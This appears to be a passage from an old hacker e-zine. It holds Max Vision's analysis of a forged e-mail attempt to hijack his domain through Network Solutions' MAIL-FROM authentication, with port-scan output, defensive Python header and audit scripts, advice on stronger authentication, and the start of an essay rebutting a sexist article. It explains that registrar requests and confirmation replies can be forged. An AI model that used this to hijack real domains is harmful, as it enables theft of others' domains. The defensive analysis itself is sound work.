>Date: Sun, 02 Jan 2000 17:19:40 -0500
>From: Max Vision
>Organization: Max Vision

They set this as part of their use of gateway.net to forge the email

>X-Sender: "Max Vision" (Unverified)

If they didn't forge this header, it looks like an outdated Netscape on win98

>X-Mailer: Mozilla 4.06 [en]C-gatewaynet (Win98; I)
>MIME-Version: 1.0
>To: hostmaster@networksolutions.com
>Subject: [NIC-000102.b318] Re: MODIFY DOMAIN maxvision.net
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>X-MTS-Ticket: 000102.b318
>X-MTS-Type: Domain
>X-MTS-Mode: Modify
>X-MTS-Priority: Normal
>X-MTS-Status: Open
>X-MTS-Timestamp: 000102171706
>
>
>----------------------------------------------------
>This is the Domain Name Registration Agreement you
>recently created.
>In order to complete this modification,
>
>YOU MUST E-MAIL THIS FORM TO: hostmaster@networksolutions.com
>
>After you e-mail this form, you should receive an auto-reply
>with a tracking number. You must use that number in the
>Subject of any future messages you send regarding
>this registration action.
>Once this registration action is completed you will receive
>a notification via e-mail.
>
>**** PLEASE DO NOT REMOVE Version Number or any of the information below
>when submitting this template to hostmaster@networksolutions.com. *****
>
>Domain Version Number: 5.0
>
>********* Email completed agreement to hostmaster@networksolutions.com
>*********
>
>
>AGREEMENT TO BE BOUND. By applying for a Network Solutions' service(s)
>through our online application process or by applying for and registering a
>domain name as part of our e-mail template application process or by using
>the service(s) provided by Network Solutions under the Service Agreement,
>Version 5.0, you acknowledge that you have read and agree to be bound by all
>terms and conditions of this Agreement and any pertinent rules or policies
>that are or may be published by Network Solutions.
>
>Please find the Network Solutions Service Agreement, Version 5.0 located
>at
>the URL http://www.networksolutions.com/legal/service-agreement.html.
>
>
>[URL ftp://www.networksolutions.com]
>[11/99]
>
>Authorization

The attacker used the wrong text here, ignorant switching of "Name" for "New"

>0a. (N)ew (M)odify (D)elete.........: M Name Registration
>0b. Auth Scheme.....................: MAIL-FROM
>0c. Auth Info.......................:
>
>1. Comments........................:
>
>2. Complete Domain Name............: maxvision.net
>
>Organization Using Domain Name

Here they retained my old contact info

>3a. Organization Name................: Max Vision
>3b. Street Address..................: 65 Washington Ave Suite 180
>3c. City............................: Santa Clara
>3d. State...........................: CA
>3e. Postal Code.....................: 95050
>3f. Country.........................: US
>
>Administrative Contact

and here they tried to make "themself" the admin contact

>4a. NIC Handle (if known)...........:
>4b. (I)ndividual (R)ole?............: Individual
>4c. Name (Last, First)..............: Stakl, Joe
>4d. Organization Name...............: Max Vision

there is no Gate street in this city, AFAIK

>4e. Street Address..................: 1458 Gate St.
>4f. City............................: Saint Mary
>4g. State...........................: MD
>4h. Postal Code.....................: 20618
>4i. Country.........................: USA

This number is invalid

>4j. Phone Number....................: 401-597-0588
>4k. Fax Number......................:
>4l. E-Mailbox.......................: vision@HUNGRY.COM
>
>Technical Contact

Same problems as Admin contact info above

>5a. NIC Handle (if known)...........:
>5b. (I)ndividual (R)ole?............: Individual
>5c. Name(Last, First)...............: Stakl, Joe
>5d. Organization Name...............: Max Vision
>5e. Street Address..................: 1458 Gate St.
>5f. City............................: Saint Mary
>5g. State...........................: MD
>5h. Postal Code.....................: 20618
>5i. Country.........................: USA
>5j. Phone Number....................: 401-597-0588
>5k. Fax Number......................:
>5l. E-Mailbox.......................: vision@HUNGRY.COM
>
>Billing Contact

How nice of them, leave me the bill

>6a. NIC Handle (if known)...........: MV777
>6b. (I)ndividual (R)ole?............: Individual
>6c. Name (Last, First)..............:
>6d. Organization Name...............:
>6e. Street Address..................:
>6f. City............................:
>6g. State...........................:
>6h. Postal Code.....................:
>6i. Country.........................:
>6j. Phone Number....................:
>6k. Fax Number......................:
>6l. E-Mailbox.......................:
>

These are the nameservers they intended to use in the hijacking
The IP addresses resolve to

>Prime Name Server
>7a. Primary Server Hostname.........: S-CLUB.4MG.COM
>7b. Primary Server Netaddress.......: 209.210.67.126
>
>Secondary Name Server(s)
>8a. Secondary Server Hostname.......: S-CLUB.4MG.COM
>8b. Secondary Server Netaddress.....: 209.210.67.126
>
>
>END OF AGREEMENT
>
>
>For instructions, please refer to:
>"http://www.networksolutions.com/help/inst-mod.html"

The trail of evidence is overwhelming.
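The Received chain of the forged message above, walked hop by hop in an added example (not part of Max Vision's write-up): it recovers the connecting address the first relay recorded, flags the HELO name that disagrees with reverse DNS, and shows that the From address MAIL-FROM relies on has nothing to do with where the mail came from. The header text is copied from the quoted message; the From address is taken from its envelope line, and comparing only the last two DNS labels is a simplifying assumption.

```python
import ipaddress
import re
from dataclasses import dataclass
from email import message_from_string
from email.utils import parseaddr

# Headers copied from the forged message quoted above (the "for" recipient is
# already missing there). The From address is taken from its envelope line.
RAW = """\
Received: from rs.internic.net (bipmx2.lb.internic.net [192.168.120.15])
 by opsmail.internic.net (8.9.3/8.9.1) with SMTP id RAA28490
 for ; Sun, 2 Jan 2000 17:17:05 -0500 (EST)
Received: (qmail 6410 invoked from network); 2 Jan 2000 22:17:05 -0000
Received: from relaye.gateway.net (HELO smtp9.gateway.net) (208.230.117.253)
 by 192.168.119.15 with SMTP; 2 Jan 2000 22:17:05 -0000
Received: from HUNGRY.COM (98C9A0CE.ipt.aol.com [152.201.160.206])
 by smtp9.gateway.net (8.9.3/8.9.3) with ESMTP id RAA13460
 for ; Sun, 2 Jan 2000 17:17:03 -0500 (EST)
From: Max Vision <vision@HUNGRY.COM>
Subject: [NIC-000102.b318] Re: MODIFY DOMAIN maxvision.net

"""

# sendmail style: from <HELO name> (<reverse DNS> [<ip>])
SENDMAIL = re.compile(r"^from (\S+) \(([^\s\[\]]+) \[([0-9.]+)\]\)")
# qmail style:    from <reverse DNS> (HELO <HELO name>) (<ip>)
QMAIL = re.compile(r"^from (\S+) \(HELO ([^\s)]+)\) \(([0-9.]+)\)")
BY = re.compile(r"\bby (\S+)")


@dataclass
class Hop:
    helo: str  # name the client claimed in HELO; sender-controlled
    rdns: str  # name the receiving server resolved for the peer address
    ip: str    # peer address of the TCP connection, as the server saw it
    by: str    # server that wrote this header


def parse_hops(raw):
    """Return relay hops, newest first, skipping headers that name no peer."""
    hops = []
    for value in message_from_string(raw).get_all("Received", []):
        text = " ".join(value.split())  # undo header folding
        by = BY.search(text)
        by_host = by.group(1) if by else ""
        m = QMAIL.match(text)
        if m:
            hops.append(Hop(m.group(2), m.group(1), m.group(3), by_host))
            continue
        m = SENDMAIL.match(text)
        if m:
            hops.append(Hop(m.group(1), m.group(2), m.group(3), by_host))
    return hops


def org_domain(name):
    """Last two DNS labels, lower-cased (assumption: no public-suffix list)."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def is_private(ip):
    return ipaddress.ip_address(ip).is_private


def analyze(raw):
    """Summarise what the relay-written headers say about the sender."""
    msg = message_from_string(raw)
    hops = parse_hops(raw)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2]
    # Oldest hop with a routable peer address: the client that connected to
    # the first relay in the chain.
    origin = next((h for h in reversed(hops) if not is_private(h.ip)), None)
    from_ok = (origin is not None
               and org_domain(from_domain) == org_domain(origin.rdns))
    return {
        "origin_ip": origin.ip if origin else None,
        "origin_rdns": origin.rdns if origin else None,
        # HELO is typed by the client; a name outside the peer's own
        # reverse-DNS domain is an indicator worth a second look.
        "helo_mismatches": [(h.helo, h.rdns) for h in hops
                            if org_domain(h.helo) != org_domain(h.rdns)],
        # RFC 1918 peers are hand-offs inside one operator's network.
        "internal_hops": [h.ip for h in hops if is_private(h.ip)],
        # An indicator only: mail is often sent from another network.
        "from_matches_origin": from_ok,
    }


if __name__ == "__main__":
    for key, value in analyze(RAW).items():
        print(f"{key}: {value}")
```

The recovered origin is only as trustworthy as the relay that recorded it; any Received line below the first relay you trust is text supplied by the sender.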
Here is the breakdown, then I'll discuss each element:

  - attacker, using an AOL.COM IP address, sent forged email using GATEWAY.NET mail relay. This is known to be true, since the networksolutions.com mail server (rs.internic.net) is resistant to TCP spoofing, as is relaye.gateway.net.

  - the AOL.COM address was inactive, so they must have disconnected immediately after sending the forged email (AOL absolutely does not care *at all* about this, and all attempts to reach the abuse or security teams of AOL, Gateway.NET, and Internic have yielded no reply. NO WONDER.)

  - the contact information was all false. The only point of control that the attacker gets is the DNS service. If the attacker intended Denial of Service, then they might not have control of the Linux DNS server. If the attacker intended control of the domain, then they either own/operate the Linux DNS server, or they have rooted the machine.

  - The Linux DNS server is a freeservers.com webhosting server - when the HTTP/1.1 hostname s-club.4mg.com is used, the following webpage appears (indicating that they do have control of the linux server, and that they intended to hijack my domain and Nokia's):

Internic's mail server is not vulnerable to TCP spoofing, which indicates that the header information is valid - that a mail really did reach their servers from the relay host, relaye.gateway.net.

not spoofed: rs.internic.net

rs.internic.net (198.41.0.6)
TCP Sequence Prediction: Class=truly random
                         Difficulty=9999999 (Good luck!)
Sequence numbers: 3763161D 84916A9 979391FC 660A454A 4D3417E0 5DD7DB3B

relaye.gateway.net is also not vulnerable to TCP spoofing, which indicates that the header information is valid - that a mail really did reach their servers from the attacker, 98C9A0CE.ipt.aol.com [152.201.160.206].
not spoofed: mail relay host

relaye.gateway.net (208.230.117.253):
TCP Sequence Prediction: Class=random positive increments
                         Difficulty=50749 (Worthy challenge)
Remote operating system guess: BSDI BSD/OS 3.0-3.1

Based on this information, the likelihood of the email being truly forged (at the packet level) is extremely low. This appears to be a straightforward application-level forgery from the AOL account.

Having a look at the DNS server that the attacker was trying to substitute for mine, to control the domain, we see it is an older Linux system, that is acting as a virtual webserver. I have contacted the rightful administrators of the system about the attempted attack.

overview: substitute dns server

FreeServers.com - www26 Server
Provo, Utah - USA

www26.freeservers.com (209.210.67.126):
Port    State       Protocol  Service
21      open        tcp       ftp
23      open        tcp       telnet
25      open        tcp       smtp
37      open        tcp       time
80      open        tcp       http
111     open        tcp       sunrpc
113     open        tcp       auth
513     open        tcp       login
514     open        tcp       shell
2049    open        tcp       nfs
3306    open        tcp       mysql

TCP Sequence Prediction: Class=truly random
                         Difficulty=9999999 (Good luck!)
Remote operating system guess: Linux 2.0.35-37

HOW TO DEFEND YOURSELF

Internic offers three authentication methods for domain administrators. MAIL-FROM, CRYPT-PW, and PGP. Each can be used to effectively protect against this type of hijacking effect, each with increasing levels of effectiveness. The following are summaries that discuss how each is used. After each description I'll briefly discuss their vulnerabilities.

MAIL-FROM

MAIL-FROM is the most basic type of authentication scheme. Under this level of protection, Network Solutions will verify that a Domain Name Registration Agreement, Contact Form or Host Form was submitted from the e-mail address, as listed in our database, of the administrative or technical contact of the record to be changed.
MAIL-FROM checks to see that requests to update your contact record -- or any record that you are associated with -- are sent from the current E-mail address of the contact. By default, all the contacts in the database have MAIL-FROM protection unless they have used the Contact Form to associate their contact record with a PGP key or an encrypted password.

MAIL-FROM is the default authentication scheme. If you are not sure which of the three options to select, choose MAIL-FROM - it is the default.

MAIL-FROM is the default, and weakest security level. Don't follow their advice, use CRYPT-PW at the minimum.

CRYPT-PW

In the protection hierarchy, encrypted password, or CRYPT-PW, is the next highest level of protection for a domain name registration record. CRYPT-PW allows updates to be submitted from any e-mail address, and, if the correct password is supplied, Network Solutions will process the Domain Name Registration Agreement, Contact Form or Host Form.

If you would like to guard your contact record -- and any other database records that you are a contact for -- with a password, enter the plain text of the password in the box below. After you enter the password in the box below it will be encrypted and entered on the form in the correct place. Enter the password a second time to verify that you have entered the plain text of the password correctly. Do not lose this password. Updates to database records may be significantly delayed if this password is lost.

CRYPT-PW is a more secure authentication mechanism, as it requires the use of the correct password to effect a domain change. This may be exceedingly difficult to guess, as Internic may have anti-password-guessing measures in place to curb endless "guesses".

PGP

Pretty Good Privacy provides the highest level of security. PGP is an encryption and digital signature scheme. While 100% security can never be guaranteed, PGP is a very safe scheme.
In order to use PGP as your authentication scheme, the PGP software must be installed on your computer. This software is available both commercially and as freeware.

If you wish to protect your contact record -- and all records that you are a listed contact for -- with Pretty Good Privacy encryption software, choose this option.

IMPORTANT: You must obtain the PGP software and install it on your computer before you can use this security feature. PGP is available commercially and as shareware. To find out more about getting started with PGP, read our help files on how to obtain and install PGP.

Your PGP key MUST be added to the Network Solutions' key server before you can use the Contact Form to associate a PGP public key with this contact.

Enter the key ID of your PGP public key in the box below. If you have installed the PGP software on your machine but you do not know your key ID, type:

  pgp -kvc

on your local machine to discover the eight digit key ID of your PGP key.

IMPORTANT: If you have selected PGP, keep in mind that when the contact template is generated and E-mailed to you, you must FIRST sign the update request with your secret PGP key before sending the contact template to Network Solutions.

PGP is the strongest security level, as it is virtually impossible for an attacker to guess the correct private key. PGP is widely held to be one of the more secure/trusted forms of encryption/authentication.

There are also settings for "Notification Levels" for updates or usage. If an attacker is aware of this, they can forge the request email, and then forge an additional ACK email.

Notification Levels

The administrative and technical contact/agent will each choose when they would like to be notified to validate a Domain Name Registration Agreement, Contact Form or Host Form. The options they can choose from are: BEFORE-UPDATE; AFTER-UPDATE; and NOT-CARE. The administrative and technical contacts are not required to choose the same option.
Network Solutions will act upon the first reply we receive.

If the contact selects BEFORE-UPDATE, Network Solutions will send a confirmation request before any changes are made, even if the request was received from an authorized source. The contact then has the opportunity to acknowledge the validity of the request by replying "ACK" or "YES" to the notification. If the contact does not agree with the change request, replying "NAK" or "NO" to the notification will prevent any changes from being made. Selecting BEFORE-UPDATE may delay legitimate changes while Network Solutions waits for approval to make the requested change.

If the contact selects AFTER-UPDATE, Network Solutions will send a confirmation request after changes have been made. Even if AFTER-UPDATE is the selected level of protection, Network Solutions will only process a Domain Name Registration Agreement, Contact Form or Host Form if it was received from an authorized source, or if the registrant gives its express written permission to make the requested change. Both the administrative and technical contacts have the opportunity to acknowledge the validity of the request by replying "ACK" or "YES" to the notification. If either one of the contacts does not agree with the change request, replying "NAK" or "NO" to the notification will usually reverse any changes that were made. AFTER-UPDATE is the default option if no other type of notification is selected.

If the contact selects NOT-CARE, Network Solutions will never send a confirmation to that contact. By choosing this option, the contact establishes that they are not concerned about whether or not authorized changes are made to any domain name registration, contact record or host record with which he is associated.

As stated above, MAIL-FROM is not really enhanced with the BEFORE-UPDATE feature, as an attacker could forge a corresponding ACK message.

CONCLUSION

There are some serious security issues with the current Internic Guardian system.
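The scheme and notification rules quoted above can be modelled in a few lines to audit which contact records rest on nothing but the From: header. This is an added illustration in Python, not code from Network Solutions or from the original article; the SHA-256 password hash, the From:-only matching of the ACK reply, and all sample addresses and the key ID are assumptions made for the example.

```python
import hashlib, hmac
from dataclasses import dataclass

@dataclass
class Contact:
    email: str
    auth: str = "MAIL-FROM"        # MAIL-FROM | CRYPT-PW | PGP
    notify: str = "AFTER-UPDATE"   # BEFORE-UPDATE | AFTER-UPDATE | NOT-CARE
    pw_hash: str = ""              # set for CRYPT-PW
    key_id: str = ""               # set for PGP

@dataclass
class Mail:
    from_header: str               # whatever the sender chose to put there
    body: str = ""
    password: str = ""
    verified_key_id: str = ""      # key ID of a signature that verified, else ""

def hash_pw(pw):  # assumption: SHA-256 stands in for the registry's own scheme
    return hashlib.sha256(pw.encode()).hexdigest()

def same_addr(a, b):
    return a.strip().lower() == b.strip().lower()

def authorized(c, m):
    if c.auth == "CRYPT-PW":
        return bool(c.pw_hash) and hmac.compare_digest(hash_pw(m.password), c.pw_hash)
    if c.auth == "PGP":
        return bool(c.key_id) and m.verified_key_id == c.key_id
    return same_addr(m.from_header, c.email)   # MAIL-FROM, the default

def update_applied(c, request, reply=None):  # True if the change takes effect
    if not authorized(c, request):
        return False
    if c.notify == "BEFORE-UPDATE":
        # Assumption: the confirmation is matched on its From: header only.
        return (reply is not None and same_addr(reply.from_header, c.email)
                and reply.body.strip().upper() in ("ACK", "YES"))
    return True   # AFTER-UPDATE and NOT-CARE: the change is made first

def audit(contacts):
    """Addresses whose records change on mail that only sets From:."""
    return [c.email for c in contacts
            if update_applied(c, Mail(c.email, "request"), Mail(c.email, "ACK"))]

# Constructed sample records; all addresses and the key ID are placeholders.
CONTACTS = [Contact("admin@example.com"),
            Contact("tech@example.net", notify="BEFORE-UPDATE"),
            Contact("ops@example.org", auth="CRYPT-PW", pw_hash=hash_pw("s3cret")),
            Contact("sec@example.edu", auth="PGP", key_id="0A1B2C3D")]
```

Calling audit(CONTACTS) returns both MAIL-FROM records, including the one set to BEFORE-UPDATE, while the CRYPT-PW and PGP records are left out.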
Domain Hijacking is as easy as ever, and many newbie crackers have been actively using this attack to hijack website addresses. Over the Y2K weekend it was rumored that several large sites suffered from this attack. If you are a domain contact and have not set encryption authentication options such as CRYPT-PW or PGP, then DO SO NOW!

Max Vision

@HWA

56.0 "A well known but overlooked threat to Hackers: Themselves"
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.hackernews.com/bufferoverflow/00/threat.html

In response to "Scene Whores" HNN buffer overflow article:

A Well Known But Overlooked Threat to Hackers: Themselves

By: Carole Fennelly

The recent HNN article "Scene Whores" by Erik Parker was advertised as "controversial". There is a fine difference between "controversy" and "shock tactics". The first is intended to provoke discussion to reveal opposing sides of an issue. The second is intended to provoke outrage for the purposes of cheap publicity. I work in a city that is home to more radio "Shock Jocks" than any other. I am, unfortunately, well aware of the dangers of falling into the trap of responding to such tactics. For any who really believe the emotional and sexist ramblings of that article: no one will change your mind - and that is, indeed, unfortunate. For the others who just view it as harmless babble, I intend to prove that it is, indeed, harmful.

The article promises to reveal an overlooked threat to hackers. It delivers nothing more than the emotional outburst of someone who was jilted. It should probably be simply dismissed for the immature rambling that it is. I cannot do so. Not because I am a woman - because I am a security professional who will not let pass an article that endorses FUD (Fear, Uncertainty and Doubt). This may not have been the intent, but it was the result.

In this article, Mr. Parker comes to the conclusion that Scene Whores are female and hackers are male:

"I will always refer to woman as the scene whores, and use 'she' when speaking about scene whores. The reasoning behind this is, the majority of hackers are men."

One passage brought to mind a scene in Dr. Strangelove where the general warns that women steal "our precious bodily fluids":

"They are a real threat. They waste our time, ruin friendships, cause chaos between hackers, and generally ruin periods of our life"

What the article succeeded in doing was to reinforce the stereotype that women have only one purpose in the technical world - sex. Further, it supports the medieval belief that women are evil and must be kept in their place:

"Hopefully we can start identifying scene whores quicker, and securing ourselves against them quicker, and put them out of commission."

I guess the next Defcon Event will be The Scene Whore Trials.. followed by burning them at the stake. Since the only method suggested to determine who these evil Scene Whores are is one of gender, all women must be guilty:

"Now the hard part is.. To determine which ones aren't scene whores. The ones who have been wi